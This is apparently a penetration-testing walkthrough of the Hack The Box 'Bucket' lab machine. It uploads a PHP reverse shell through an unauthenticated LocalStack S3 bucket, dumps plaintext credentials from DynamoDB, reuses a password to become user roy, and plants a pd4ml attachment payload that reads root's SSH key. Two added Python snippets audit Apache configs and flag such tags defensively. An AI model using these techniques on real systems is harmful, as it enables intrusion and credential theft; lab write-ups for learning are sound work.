
| Service | User | Password |
| --- | --- | --- |
| ? | Mgmt | Management@#1# |
| ? | Cloudadm | Welcome123! |
| ? | Sysadm | n2vM_K_Q.Aa2 |
| ssh | Roy | n2vM_K_Q.Aa2 |

SSH Keys
Root

# Nmap
*OS: Ubuntu*
*Hostname leak in title*

```bash
# Nmap 7.91 scan initiated Sun Apr 25 13:47:51 2021 as: nmap -sC -sV -oA bucket 10.10.10.212
Nmap scan report for bucket.htb (10.10.10.212)
Host is up (0.56s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Apr 25 13:48:44 2021 -- 1 IP address (1 host up) scanned in 53.15 seconds
```

When we visit bucket.htb, open the browser's developer tools, refresh the page and look at the Network tab, we find a new host:

```bash
s3.bucket.htb
```

When we curl the headers of s3.bucket.htb, the response shows that it is using the Amazon stuff (note the `x-amz-*` headers):

```bash
curl --head s3.bucket.htb

HTTP/1.1 404
Date: Sun, 25 Apr 2021 19:07:58 GMT
Server: hypercorn-h11
content-type: text/html; charset=utf-8
content-length: 21
access-control-allow-origin: *
access-control-allow-methods: HEAD,GET,PUT,POST,DELETE,OPTIONS,PATCH
access-control-allow-headers: authorization,content-type,content-md5,cache-control,x-amz-content-sha256,x-amz-date,x-amz-security-token,x-amz-user-agent,x-amz-target,x-amz-acl,x-amz-version-id,x-localstack-target,x-amz-tagging
access-control-expose-headers: x-amz-version-id
```

We have to install awscli:

```bash
apt install awscli
```

Using aws to list the buckets:

```bash
aws --endpoint-url http://s3.bucket.htb s3 ls

2021-04-26 00:42:03 adserver
```

We are going to use the PHP reverse shell:

```bash
cp /usr/share/laudanum/php/php-reverse-shell.php rev.php
```

### Getting into the machine

### First LS
```bash
aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://adserver/
```

#### Fake Cred

These creds work because LocalStack is being used and doesn't have IAM configured (?).

```bash
aws configure
AWS Access Key ID [****************nshi]:
AWS Secret Access Key [****************lol]:
Default region name [us-east-1]:
Default output format [None]:
```

#### LS

```bash
aws --endpoint-url http://s3.bucket.htb s3 ls adserver

PRE images/
2021-04-26 00:46:02 5344 index.html
```

#### cp

```bash
aws --endpoint-url http://s3.bucket.htb s3 cp rev.php s3://adserver/

upload: ./rev.php to s3://adserver/rev.php
```

#### Proof

```bash
aws --endpoint-url http://s3.bucket.htb s3 ls adserver

PRE images/
2021-04-26 01:04:04 5344 index.html
2021-04-26 01:05:36 5492 rev.php
```

Then visit the site to gain the first LS:

* s3.bucket.htb
* bucket.htb/rev.php

## Apache virtual Host

Port 8000: running as root

```bash
www-data@bucket:/etc/apache2/sites-enabled$ cat 000-default.conf | grep -v '\#' | grep .
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
DocumentRoot /var/www/bucket-app
</VirtualHost>
<VirtualHost *:80>
DocumentRoot /var/www/html
RewriteEngine On
RewriteCond %{HTTP_HOST} !^bucket.htb$
RewriteRule /.* http://bucket.htb/ [R]
</VirtualHost>
<VirtualHost *:80>
ProxyPreserveHost on
# 4586 == Docker {Localstack}
ProxyPass / http://localhost:4566/
ProxyPassReverse / http://localhost:4566/
<Proxy *>
Order deny,allow
Allow from all
</Proxy>
ServerAdmin webmaster@localhost
ServerName s3.bucket.htb
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```

## Dumping dynamodb

```bash
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users
{
"Items": [
{
"password": {
"S": "Management@#1@#"
},
"username": {
"S": "Mgmt"
}
},
{
"password": {
"S": "Welcome123!"
},
"username": {
"S": "Cloudadm"
}
},
{
"password": {
"S": "n2vM-<_K_Q:.Aa2"
},
"username": {
"S": "Sysadm"
}
}
],
"Count": 3,
"ScannedCount": 3,
"ConsumedCapacity": null
}

```

### Making it Pretty

```bash
aws --endpoint-url http://s3.bucket.htb dynamodb scan --table-name users | jq -r '.Items[] | "\(.username[]):\(.password[])"'
Mgmt:Management@#1@#
Cloudadm:Welcome123!
Sysadm:n2vM-<_K_Q:.Aa2
```

## Roy users
```bash
www-data@bucket:/var/www$ su - roy
su - roy
Password: n2vM-<_K_Q:.Aa2

roy@bucket:~$ ls
ls
project user.txt
roy@bucket:~$ cat user.txt
cat user.txt
9ee0f12055e8fed79aeaaf078df09479

```

We can also use ssh, but sometimes it refuses the connection, so we do `su - roy` with the password `n2vM_K_Q.Aa2`.

```bash

ssh roy@10.10.10.212
The authenticity of host '10.10.10.212 (10.10.10.212)' can't be established.
ECDSA key fingerprint is SHA256:7+5qUqmyILv7QKrQXPArj5uYqJwwe7mpUbzD/7cl44E.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.212' (ECDSA) to the list of known hosts.
roy@10.10.10.212's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-48-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 25 Apr 2021 08:53:25 PM UTC

System load: 0.07


Usage of /: 37.4% of 17.59GB
Memory usage: 33%
Swap usage: 0%
Processes: 287
Users logged in: 0
IPv4 address for br-bee97070fb20: 172.18.0.1
IPv4 address for docker0: 172.17.0.1
IPv4 address for ens160: 10.10.10.212
IPv6 address for ens160: dead:beef::250:56ff:feb9:6235

229 updates can be installed immediately.


103 of these updates are security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.


To check for new updates run: sudo apt update

Last login: Sun Apr 25 16:53:08 2021 from 10.10.14.116


```

# Roy
## Gain Access
*Password reuse from dynamodb: n2vM-<_K_Q:.Aa2*
## Port 8000
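
The application on 127.0.0.1:8000 is served as root (`AssignUserId root root` in the `000-default.conf` shown earlier), and the same file proxies s3.bucket.htb to a loopback backend with an allow-all rule. The following audit is an added example, not part of the original notes: it flags both patterns in an Apache configuration, and the function names and the abridged sample are constructed here.

```python
import re

# Constructed sample: directives from the 000-default.conf shown earlier (abridged).
SAMPLE_CONF = """\
<VirtualHost 127.0.0.1:8000>
<IfModule mpm_itk_module>
AssignUserId root root
</IfModule>
</VirtualHost>
<VirtualHost *:80>
ProxyPass / http://localhost:4566/
<Proxy *>
Allow from all
</Proxy>
ServerName s3.bucket.htb
</VirtualHost>
"""
LOOPBACK = re.compile(r"https?://(localhost|127\.\d+\.\d+\.\d+|\[::1\])(?=[:/]|$)", re.I)
ALLOW_ALL = {("allow", "from", "all"), ("require", "all", "granted")}

def split_vhosts(conf):
    """Yield (address, directives) per <VirtualHost>; each directive is a word list."""
    addr, body = None, []
    for line in (l.strip() for l in conf.splitlines()):
        opened = re.match(r"<VirtualHost\s+([^>]+)>", line, re.I)
        if opened:
            addr, body = opened.group(1).strip(), []
        elif line.lower().startswith("</virtualhost") and addr is not None:
            yield addr, body
            addr = None
        elif addr is not None and line and not line.startswith("#"):
            body.append(line.split())

def audit(conf):
    """Return (vhost address, finding) tuples for the two risky patterns."""
    findings = []
    for addr, body in split_vhosts(conf):
        lowered = [tuple(w.lower() for w in d) for d in body]
        if any(d[:2] == ("assignuserid", "root") for d in lowered):
            findings.append((addr, "requests are served as root (mpm_itk AssignUserId)"))
        backends = [d[2] for d in body if d[0].lower() == "proxypass" and len(d) > 2]
        local = [b for b in backends if LOOPBACK.match(b)]
        if local and any(d[:3] in ALLOW_ALL for d in lowered):
            findings.append((addr, "allow-all proxy to loopback backend " + local[0]))
    return findings

if __name__ == "__main__":
    for addr, finding in audit(SAMPLE_CONF):
        print(f"{addr}: {finding}")
```
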
![[Pasted image 20210426134449.png]]

### Table
*To create the table*
```bash
aws --endpoint-url http://s3.bucket.htb dynamodb create-table \
    --table-name alerts \
    --attribute-definitions AttributeName=title,AttributeType=S \
    --key-schema AttributeName=title,KeyType=HASH \
    --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5
```

To see the tables:

```bash
aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
```

#### Ransomware.json

We have to upload it to get the important stuff:

```json
{
  "title": {"S": "Ransomware"},
  "data": {"S": "<html><pd4ml:attachment src='file:///root/.ssh/id_rsa' description='attachment sample' icon='Paperclip'/>"}
}
```

#### Uploading ransomware

```bash
aws --endpoint-url http://s3.bucket.htb dynamodb put-item --table-name alerts --item file://Ransomware.json
```

#### Check

To check whether our content is uploaded, run:

```bash
root💀kali)-[/home/manshi/hackthebox/machine/bucket]
└─# aws --endpoint-url http://s3.bucket.htb dynamodb list-tables
{
    "TableNames": [
        "alerts",
        "users"
    ]
}
```

Now use curl and try to get the main stuff:

```bash
curl -X POST -d "action=get_alerts" http://127.0.0.1:8000
```

#### Getting the important stuff

Visit the site and refresh the URL, i.e. localhost:8000/files
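
The item stored in `alerts` carries a `pd4ml:attachment` tag whose `src` is a `file://` URI, that is, a request for the PDF converter to embed a local file. The following check is an added example, not code from the original notes or from the application: it walks items in DynamoDB JSON form and reports string attributes containing `pd4ml:` tags or `file:` references so they can be rejected before conversion. The function names and the second, harmless item are constructed.

```python
import re

# Constructed sample in DynamoDB JSON form: the first item is the one from the
# notes above, the second is a harmless alert made up for contrast.
SAMPLE_ITEMS = [
    {"title": {"S": "Ransomware"},
     "data": {"S": "<html><pd4ml:attachment src='file:///root/.ssh/id_rsa' "
                   "description='attachment sample' icon='Paperclip'/>"}},
    {"title": {"S": "Disk usage"},
     "data": {"S": "<html><p>/var is 91% full</p></html>"}},
]

# Tags in the pd4ml: namespace, and src/href attributes that point at local files.
PD4ML_TAG = re.compile(r"<\s*pd4ml:([a-z.]+)", re.I)
LOCAL_URI = re.compile(r"""(?:src|href)\s*=\s*['"]?\s*(file:[^'"\s>]*)""", re.I)

def strings(attr, path):
    """Walk one DynamoDB attribute value and yield (path, text) for every S."""
    for kind, value in attr.items():
        if kind == "S":
            yield path, value
        elif kind == "M":
            for key, sub in value.items():
                yield from strings(sub, f"{path}.{key}")
        elif kind == "L":
            for i, sub in enumerate(value):
                yield from strings(sub, f"{path}[{i}]")

def scan_item(item):
    """Return findings as (attribute path, reason) for one item."""
    findings = []
    for name, attr in item.items():
        for path, text in strings(attr, name):
            for tag in PD4ML_TAG.findall(text):
                findings.append((path, f"pd4ml:{tag.lower()} tag"))
            for uri in LOCAL_URI.findall(text):
                findings.append((path, f"local file reference {uri}"))
    return findings

if __name__ == "__main__":
    for item in SAMPLE_ITEMS:
        print(item["title"]["S"], scan_item(item) or "clean")
```

A filter like this is a backstop: running the converter under an unprivileged account limits what any embedded file reference can reach.
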
## AWS Creds

Need root

```bash
www-data@bucket:/.aws$ ls -la
ls -la
total 16
drwxr-xr-x 2 root root 4096 Sep 23 2020 .
drwxr-xr-x 21 root root 4096 Feb 10 12:49 ..
-rw------- 1 root root 22 Sep 16 2020 config
-rw------- 1 root root 64 Sep 16 2020 credentials
```

## Unknown socket

```bash
www-data@bucket:/$ ss -lnpt
ss -lnpt
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
[snip]
LISTEN 0 4096 127.0.0.1:39035 0.0.0.0:*
[snip]
```
